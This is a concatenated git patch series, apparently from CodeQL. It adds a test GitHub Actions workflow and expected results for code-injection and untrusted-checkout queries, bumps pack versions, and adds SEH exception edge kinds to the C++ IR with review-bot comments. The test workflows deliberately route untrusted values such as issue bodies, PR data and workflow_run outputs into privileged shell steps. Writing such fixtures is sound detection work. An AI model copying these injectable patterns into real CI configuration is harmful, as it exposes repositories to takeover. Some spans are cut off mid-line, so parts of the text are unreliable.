@@ -0,0 +1,52 @@ +name: Test WR + +on: + workflow_run: + workflows: + - Test + types: + - completed + +permissions: + contents: write + pull-requests: write + +jobs: + setup: + name: Setup + runs-on: ubuntu-24.04 + outputs: + github-sha: ${{ steps.get-sha.outputs.sha }} + chart-version: ${{ steps.get-version.outputs.chart_version }} + steps: + - name: Get triggering event SHA + id: get-sha + run: | + if [[ "${{ github.event_name }}" == "workflow_dispatch" ]]; then + echo sha="${{ inputs.checkout_ref }}" >> $GITHUB_OUTPUT + elif [[ "${{ github.event_name }}" == "workflow_run" ]]; then + echo sha="${{ github.event.workflow_run.head_sha }}" >> $GITHUB_OUTPUT + elif [[ "${{ github.event_name }}" == "push" ]]; then + echo sha="${{ github.sha }}" >> $GITHUB_OUTPUT + else + echo "Invalid event type" + exit 1 + fi + - name: Checkout Source Code + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + with: + persist-credentials: false + ref: ${{ steps.get-sha.outputs.sha }} + fetch-depth: 0 + - name: Get version + id: get-version + run: | + echo "chart_version=$(> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | ${{ needs.setup.outputs.chart-version }} | .github/workflows/test27.yml:4:3:4:14 | workflow_run | workflow_run | | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index e6066479576..e13c2b80a72 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -206,6 +206,11 @@ edges | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | provenance | | | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | provenance | | | .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | provenance | | +| .github/workflows/test27.yml:19:7:21:4 | Job outputs node [chart-version] | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | provenance | | +| .github/workflows/test27.yml:20:23:20:68 | steps.get-version.outputs.chart_version | .github/workflows/test27.yml:19:7:21:4 | Job outputs node [chart-version] | provenance | | +| .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:43:14:44:66 | echo "chart_version=$(> $GITHUB_OUTPUT shell: bash - run: python2.7 foo.py + - run: pip install --no-deps . diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 3b433ec02f1..111edb7646d 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -210,7 +210,8 @@ edges | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | -| .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:59:9:59:30 | Run Step | +| .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:59:9:60:6 | Run Step | +| .github/workflows/test7.yml:59:9:60:6 | Run Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | 
@@ -351,7 +352,8 @@ edges | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:59:9:59:30 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:59:30 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:59:9:60:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:60:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:60:9:60:37 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step 
| Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | | .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | From 9a137db12bbd01402c897653f32e896f767f2f29 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 20 Nov 2024 15:36:20 +0100 Subject: [PATCH 0708/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b72f94d1bb1..d938d0617e9 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.2.0 +version: 0.2.1 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a9f045567b0..99ac2c74011 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.2.0 +version: 0.2.1 groups: [actions, queries] suites: codeql-suites extractor: javascript From 4078d79f2a0a1ae9132ae19394970c0e6b743fef Mon Sep 17 00:00:00 2001 
From: "REDMOND\\brodes" Date: Wed, 20 Nov 2024 14:37:32 -0500 Subject: [PATCH 0709/1267] Adds SEH exception edge types, disjoint from normal C++ edges. Does not apply the edges yet, just stipulates the types. --- .../code/cpp/ir/implementation/EdgeKind.qll | 20 ++++++++++++++++--- .../raw/internal/TranslatedCall.qll | 2 +- .../raw/internal/TranslatedExpr.qll | 4 ++-- .../raw/internal/TranslatedStmt.qll | 2 +- 4 files changed, 21 insertions(+), 7 deletions(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll index 81db183fa63..38e20b65191 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/EdgeKind.qll @@ -3,12 +3,13 @@ */ private import internal.EdgeKindInternal +private import codeql.util.Boolean private newtype TEdgeKind = TGotoEdge() or // Single successor (including fall-through) TTrueEdge() or // 'true' edge of conditional branch TFalseEdge() or // 'false' edge of conditional branch - TExceptionEdge() or // Thrown exception + TExceptionEdge(Boolean isSeh) or // Thrown exception, true for SEH exceptions, false otherwise TDefaultEdge() or // 'default' label of switch TCaseEdge(string minValue, string maxValue) { // Case label of switch @@ -54,7 +55,18 @@ class FalseEdge extends EdgeKind, TFalseEdge { * instruction's evaluation throws an exception. */ class ExceptionEdge extends EdgeKind, TExceptionEdge { - final override string toString() { result = "Exception" } + Boolean isSeh; //true for Structured Exception Handling, false for C++ exceptions + + ExceptionEdge() { this = TExceptionEdge(isSeh) } + + /** + * Holds if the exception is a Structured Exception Handling (SEH) exception. + */ + final predicate isSeh() { isSeh = true } + + final override string toString() { + if isSeh = true then result = "SEH Exception" else result = "C++ Exception" + } } /** 
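Review bot: In `ExceptionEdge` the new `isSeh` field is explained only by a trailing `//` comment, and `toString()` now returns `SEH Exception` or `C++ Exception` where it used to return `Exception`. The label change is visible to anything that prints or matches edge kinds by string, so it deserves a sentence in the class QLDoc, which begins outside this hunk. I would replace the trailing comment with a QLDoc comment above the field, `/** Whether this edge is for a Structured Exception Handling (SEH) exception rather than a C++ exception. */`. I would also write the branch as `if this.isSeh() then ...`, so the predicate added here is the only place that reads the field.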
@@ -122,8 +134,10 @@ module EdgeKind { /** * Gets the single instance of the `ExceptionEdge` class. + * Gets the instance of the `ExceptionEdge` class. + * `isSeh` is true if the exception is an SEH exception, and false for a C++ edge. */ - ExceptionEdge exceptionEdge() { result = TExceptionEdge() } + ExceptionEdge exceptionEdge(Boolean isSeh) { result = TExceptionEdge(isSeh) } /** * Gets the single instance of the `DefaultEdge` class. diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedCall.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedCall.qll index daa6bdaafcf..16352ffaf7c 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedCall.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedCall.qll @@ -88,7 +88,7 @@ abstract class TranslatedCall extends TranslatedExpr { result = this.getParent().getChildSuccessor(this, kind) or this.mayThrowException() and - kind instanceof ExceptionEdge and + kind = EdgeKind::exceptionEdge(false) and result = this.getParent().getExceptionSuccessorInstruction(any(GotoEdge edge)) ) } diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedExpr.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedExpr.qll index e7ccac24eb9..5dc22a810f1 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedExpr.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedExpr.qll @@ -3039,7 +3039,7 @@ class TranslatedDestructorsAfterThrow extends TranslatedElement, TTranslatedDest or // And otherwise, exit this element with an exceptional edge not exists(this.getChild(id + 1)) and - kind instanceof ExceptionEdge and + kind = EdgeKind::exceptionEdge(false) and result = this.getParent().getExceptionSuccessorInstruction(any(GotoEdge edge)) ) } 
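Review bot: The QLDoc for `exceptionEdge` keeps the old first sentence, "Gets the single instance of the `ExceptionEdge` class", as a context line, and that sentence is no longer true because there is now one instance per value of `isSeh`. Dropping that line and keeping the two added ones fixes the comment. The signature also changes from `exceptionEdge()` to `exceptionEdge(Boolean isSeh)`, which stops any caller outside the files touched here from compiling. Whether such callers exist is not visible from this hunk; if they might, a deprecated zero-argument predicate or a change note would cover it.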
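Review bot: `kind = EdgeKind::exceptionEdge(false)` in `TranslatedCall` hard-codes the C++ case with a bare literal, and the same replacement appears in both `TranslatedExpr.qll` hunks and in `TranslatedCatchByTypeHandler` in `TranslatedStmt.qll`. The commit message says SEH edges are not applied yet, but nothing at these sites records that, and the updated `ir.c` expectations label the edge out of `Call[ExRaiseAccessViolation]` as `C++ Exception`. A comment at each site, for example `// TODO: use exceptionEdge(true) once SEH edges are applied`, would mark the literal as a placeholder and make the sites easy to find later. The enclosing predicate starts outside the hunk.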
@@ -3078,7 +3078,7 @@ abstract class TranslatedThrowExpr extends TranslatedNonConstantExpr { result = this.getDestructors().getFirstInstruction(kind) or not exists(this.getDestructors()) and - kind instanceof ExceptionEdge and + kind = EdgeKind::exceptionEdge(false) and result = this.getParent().getExceptionSuccessorInstruction(any(GotoEdge edge)) ) } diff --git a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedStmt.qll b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedStmt.qll index e37df72abbd..5f70a21fdb8 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedStmt.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/implementation/raw/internal/TranslatedStmt.qll @@ -932,7 +932,7 @@ class TranslatedCatchByTypeHandler extends TranslatedHandler { kind instanceof GotoEdge and result = this.getParameter().getFirstInstruction(kind) or - kind instanceof ExceptionEdge and + kind = EdgeKind::exceptionEdge(false) and if exists(this.getDestructors()) then result = this.getDestructors().getFirstInstruction(any(GotoEdge edge)) else result = this.getParent().(TranslatedTryStmt).getNextHandler(this, any(GotoEdge edge)) From 007dd837994ae0105c9cd8d4d5f2abfaeef0944c Mon Sep 17 00:00:00 2001 From: "REDMOND\\brodes" Date: Wed, 20 Nov 2024 14:40:58 -0500 Subject: [PATCH 0710/1267] Updating ir test expected files. --- .../library-tests/ir/ir/aliased_ir.expected | 58 +++++++-------- .../test/library-tests/ir/ir/raw_ir.expected | 74 +++++++++---------- 2 files changed, 66 insertions(+), 66 deletions(-) diff --git a/cpp/ql/test/library-tests/ir/ir/aliased_ir.expected b/cpp/ql/test/library-tests/ir/ir/aliased_ir.expected index 28fde3672d9..224ac9a0ed9 100644 --- a/cpp/ql/test/library-tests/ir/ir/aliased_ir.expected +++ b/cpp/ql/test/library-tests/ir/ir/aliased_ir.expected 
@@ -2490,7 +2490,7 @@ destructors_for_temps.cpp: # 47| v47_6(void) = ^IndirectReadSideEffect[-1] : &:r47_1, ~m47_5 # 47| m47_7(ClassWithDestructor2) = ^IndirectMayWriteSideEffect[-1] : &:r47_1 # 47| m47_8(unknown) = Chi : total:m47_5, partial:m47_7 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 47| Block 4 # 47| v47_9(void) = NoOp : @@ -2574,7 +2574,7 @@ destructors_for_temps.cpp: # 52| v52_6(void) = ^IndirectReadSideEffect[-1] : &:r52_1, ~m52_5 # 52| m52_7(ClassWithDestructor2) = ^IndirectMayWriteSideEffect[-1] : &:r52_1 # 52| m52_8(unknown) = Chi : total:m52_5, partial:m52_7 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 51| Block 4 # 51| r51_32(glval) = VariableAddress[#temp51:75] : @@ -2656,7 +2656,7 @@ destructors_for_temps.cpp: # 55| m55_29(ClassWithConstructor) = ^IndirectMayWriteSideEffect[-1] : &:r55_5 # 55| m55_30(unknown) = Chi : total:m55_28, partial:m55_29 # 55| v55_31(void) = ThrowValue : &:r55_5, ~m55_30 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 55| Block 4 # 55| r55_32(glval) = VariableAddress[#temp55:75] : @@ -2721,7 +2721,7 @@ destructors_for_temps.cpp: # 59| m59_20(unknown) = Chi : total:m59_17, partial:m59_19 # 59| m59_21(char) = Store[#throw59:9] : &:r59_4, r59_15 # 59| v59_22(void) = ThrowValue : &:r59_4, m59_21 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 59| Block 4 # 59| r59_23(char) = Constant[97] : @@ -3120,7 +3120,7 @@ ir.c: # 25| v25_4(void) = Call[ExRaiseAccessViolation] : func:r25_1, 0:r25_3 # 25| m25_5(unknown) = ^CallSideEffect : ~m21_4 # 25| m25_6(unknown) = Chi : total:m21_4, partial:m25_5 -#-----| Exception -> Block 3 +#-----| C++ Exception -> Block 3 # 26| Block 1 # 26| r26_1(int) = Constant[0] : 
@@ -3167,7 +3167,7 @@ ir.c: # 36| v36_3(void) = Call[ExRaiseAccessViolation] : func:r36_1, 0:r36_2 # 36| m36_4(unknown) = ^CallSideEffect : ~m32_4 # 36| m36_5(unknown) = Chi : total:m32_4, partial:m36_4 -#-----| Exception -> Block 4 +#-----| C++ Exception -> Block 4 # 32| Block 1 # 32| v32_5(void) = Unwind : @@ -3202,7 +3202,7 @@ ir.c: # 40| v40_3(void) = Call[ExRaiseAccessViolation] : func:r40_1, 0:r40_2 # 40| m40_4(unknown) = ^CallSideEffect : ~m36_5 # 40| m40_5(unknown) = Chi : total:m36_5, partial:m40_4 -#-----| Exception -> Block 1 +#-----| C++ Exception -> Block 1 # 32| Block 6 # 32| v32_8(void) = Unreached : @@ -3241,7 +3241,7 @@ ir.c: # 62| v62_3(void) = Call[ExRaiseAccessViolation] : func:r62_1, 0:r62_2 # 62| m62_4(unknown) = ^CallSideEffect : ~m57_4 # 62| m62_5(unknown) = Chi : total:m57_4, partial:m62_4 -#-----| Exception -> Block 1 +#-----| C++ Exception -> Block 1 # 66| Block 1 # 66| r66_1(int) = Constant[1] : @@ -3263,7 +3263,7 @@ ir.c: # 73| v73_3(void) = Call[ExRaiseAccessViolation] : func:r73_1, 0:r73_2 # 73| m73_4(unknown) = ^CallSideEffect : ~m70_4 # 73| m73_5(unknown) = Chi : total:m70_4, partial:m73_4 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 70| Block 1 # 70| v70_5(void) = Unwind : @@ -3276,7 +3276,7 @@ ir.c: # 76| v76_3(void) = Call[ExRaiseAccessViolation] : func:r76_1, 0:r76_2 # 76| m76_4(unknown) = ^CallSideEffect : ~m73_5 # 76| m76_5(unknown) = Chi : total:m73_5, partial:m76_4 -#-----| Exception -> Block 1 +#-----| C++ Exception -> Block 1 # 80| void raise_access_violation() # 80| Block 0 @@ -3289,7 +3289,7 @@ ir.c: # 81| v81_3(void) = Call[ExRaiseAccessViolation] : func:r81_1, 0:r81_2 # 81| m81_4(unknown) = ^CallSideEffect : ~m80_4 # 81| m81_5(unknown) = Chi : total:m80_4, partial:m81_4 -#-----| Exception -> Block 1 +#-----| C++ Exception -> Block 1 # 80| Block 1 # 80| v80_5(void) = Unwind : 
@@ -6976,7 +6976,7 @@ ir.cpp: # 728| r728_3(char *) = Convert : r728_2 # 728| m728_4(char *) = Store[#throw728:7] : &:r728_1, r728_3 # 728| v728_5(void) = ThrowValue : &:r728_1, m728_4 -#-----| Exception -> Block 6 +#-----| C++ Exception -> Block 6 # 730| Block 4 # 730| r730_1(glval) = VariableAddress[x] : @@ -6995,7 +6995,7 @@ ir.cpp: # 735| Block 6 # 735| v735_1(void) = CatchByType[const char *] : -#-----| Exception -> Block 8 +#-----| C++ Exception -> Block 8 #-----| Goto -> Block 7 # 735| Block 7 @@ -7017,11 +7017,11 @@ ir.cpp: # 736| m736_11(String) = ^IndirectMayWriteSideEffect[-1] : &:r736_1 # 736| m736_12(unknown) = Chi : total:m736_9, partial:m736_11 # 736| v736_13(void) = ThrowValue : &:r736_1, ~m736_12 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 738| Block 8 # 738| v738_1(void) = CatchByType[const String &] : -#-----| Exception -> Block 10 +#-----| C++ Exception -> Block 10 #-----| Goto -> Block 9 # 738| Block 9 @@ -7035,7 +7035,7 @@ ir.cpp: # 740| Block 10 # 740| v740_1(void) = CatchAny : # 741| v741_1(void) = ReThrow : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 743| Block 11 # 743| v743_1(void) = NoOp : @@ -9943,7 +9943,7 @@ ir.cpp: # 1195| r1195_3(char *) = Convert : r1195_2 # 1195| m1195_4(char *) = Store[#throw1195:7] : &:r1195_1, r1195_3 # 1195| v1195_5(void) = ThrowValue : &:r1195_1, m1195_4 -#-----| Exception -> Block 6 +#-----| C++ Exception -> Block 6 # 1197| Block 4 # 1197| r1197_1(glval) = VariableAddress[x] : @@ -9962,7 +9962,7 @@ ir.cpp: # 1202| Block 6 # 1202| v1202_1(void) = CatchByType[const char *] : -#-----| Exception -> Block 8 +#-----| C++ Exception -> Block 8 #-----| Goto -> Block 7 # 1202| Block 7 
@@ -9984,11 +9984,11 @@ ir.cpp: # 1203| m1203_11(String) = ^IndirectMayWriteSideEffect[-1] : &:r1203_1 # 1203| m1203_12(unknown) = Chi : total:m1203_9, partial:m1203_11 # 1203| v1203_13(void) = ThrowValue : &:r1203_1, ~m1203_12 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 1205| Block 8 # 1205| v1205_1(void) = CatchByType[const String &] : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 #-----| Goto -> Block 9 # 1205| Block 9 @@ -16924,7 +16924,7 @@ ir.cpp: # 2281| v2281_6(void) = ^IndirectReadSideEffect[-1] : &:r2281_1, ~m2281_5 # 2281| m2281_7(String) = ^IndirectMayWriteSideEffect[-1] : &:r2281_1 # 2281| m2281_8(unknown) = Chi : total:m2281_5, partial:m2281_7 -#-----| Exception -> Block 5 +#-----| C++ Exception -> Block 5 # 2280| Block 4 # 2280| r2280_1(glval) = VariableAddress[s2] : @@ -16956,7 +16956,7 @@ ir.cpp: # 2282| Block 5 # 2282| v2282_1(void) = CatchByType[const char *] : -#-----| Exception -> Block 7 +#-----| C++ Exception -> Block 7 #-----| Goto -> Block 6 # 2282| Block 6 @@ -16978,11 +16978,11 @@ ir.cpp: # 2283| m2283_11(String) = ^IndirectMayWriteSideEffect[-1] : &:r2283_1 # 2283| m2283_12(unknown) = Chi : total:m2283_9, partial:m2283_11 # 2283| v2283_13(void) = ThrowValue : &:r2283_1, ~m2283_12 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 2285| Block 7 # 2285| v2285_1(void) = CatchByType[const String &] : -#-----| Exception -> Block 9 +#-----| C++ Exception -> Block 9 #-----| Goto -> Block 8 # 2285| Block 8 @@ -16996,7 +16996,7 @@ ir.cpp: # 2287| Block 9 # 2287| v2287_1(void) = CatchAny : # 2288| v2288_1(void) = ReThrow : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 2290| Block 10 # 2290| m2290_1(unknown) = Phi : from 4:~m2281_24, from 8:~m2281_8 
@@ -18266,7 +18266,7 @@ ir.cpp: # 2454| v2454_6(void) = ^IndirectReadSideEffect[-1] : &:r2454_1, m2452_8 # 2454| m2454_7(ClassWithDestructor) = ^IndirectMayWriteSideEffect[-1] : &:r2454_1 # 2454| m2454_8(ClassWithDestructor) = Chi : total:m2452_8, partial:m2454_7 -#-----| Exception -> Block 1 +#-----| C++ Exception -> Block 1 # 2451| Block 1 # 2451| v2451_7(void) = Unwind : @@ -18693,7 +18693,7 @@ ir.cpp: # 2537| r2537_2(int) = Constant[42] : # 2537| m2537_3(int) = Store[#throw2537:5] : &:r2537_1, r2537_2 # 2537| v2537_4(void) = ThrowValue : &:r2537_1, m2537_3 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 2534| Block 1 # 2534| m2534_5(unknown) = Phi : from 3:~m2541_6, from 4:~m2541_14 @@ -18702,7 +18702,7 @@ ir.cpp: # 2539| Block 2 # 2539| v2539_1(void) = CatchByType[char] : -#-----| Exception -> Block 4 +#-----| C++ Exception -> Block 4 #-----| Goto -> Block 3 # 2539| Block 3 @@ -38962,7 +38962,7 @@ try_except.cpp: # 48| r48_2(int) = Constant[1] : # 48| m48_3(int) = Store[#throw48:13] : &:r48_1, r48_2 # 48| v48_4(void) = ThrowValue : &:r48_1, m48_3 -#-----| Exception -> Block 4 +#-----| C++ Exception -> Block 4 # 51| Block 2 # 51| r51_1(int) = Constant[0] : diff --git a/cpp/ql/test/library-tests/ir/ir/raw_ir.expected b/cpp/ql/test/library-tests/ir/ir/raw_ir.expected index 0093a108577..8600049dd22 100644 --- a/cpp/ql/test/library-tests/ir/ir/raw_ir.expected +++ b/cpp/ql/test/library-tests/ir/ir/raw_ir.expected @@ -822,7 +822,7 @@ coroutines.cpp: #-----| Block 6 #-----| v0_24(void) = ReThrow : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 87| Block 7 # 87| r87_52(glval) = VariableAddress[(unnamed local variable)] : @@ -1001,7 +1001,7 @@ coroutines.cpp: #-----| Block 6 #-----| v0_28(void) = ReThrow : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 91| Block 7 # 91| r91_54(glval) = VariableAddress[(unnamed local variable)] : 
@@ -1239,7 +1239,7 @@ coroutines.cpp: #-----| Block 8 #-----| v0_34(void) = ReThrow : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 95| Block 9 # 95| r95_54(glval) = VariableAddress[(unnamed local variable)] : @@ -1469,7 +1469,7 @@ coroutines.cpp: #-----| Block 8 #-----| v0_27(void) = ReThrow : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 99| Block 9 # 99| r99_54(glval) = VariableAddress[(unnamed local variable)] : @@ -1707,7 +1707,7 @@ coroutines.cpp: #-----| Block 8 #-----| v0_34(void) = ReThrow : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 103| Block 9 # 103| r103_54(glval) = VariableAddress[(unnamed local variable)] : @@ -1949,7 +1949,7 @@ coroutines.cpp: #-----| Block 8 #-----| v0_34(void) = ReThrow : -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 108| Block 9 # 108| r108_54(glval) = VariableAddress[(unnamed local variable)] : @@ -2350,7 +2350,7 @@ destructors_for_temps.cpp: # 47| mu47_4(unknown) = ^CallSideEffect : ~m? # 47| v47_5(void) = ^IndirectReadSideEffect[-1] : &:r47_1, ~m? # 47| mu47_6(ClassWithDestructor2) = ^IndirectMayWriteSideEffect[-1] : &:r47_1 -#-----| Exception -> Block 2 +#-----| C++ Exception -> Block 2 # 47| Block 4 # 47| v47_7(void) = NoOp : @@ -2417,7 +2417,7 @@ destructors_for_temps.cpp: # 52| mu52_4(unknown) = ^CallSideEffect : ~m? # 52| v52_5(void) = ^IndirectReadSideEffect[-1] : &:r52_1, ~m? # 52| mu52_6(ClassWithDestructor2) = ^IndirectMayWriteSideEffect[-1] : &:r52_1 -#-----| Exception -> Block 2 +#-----| C++ 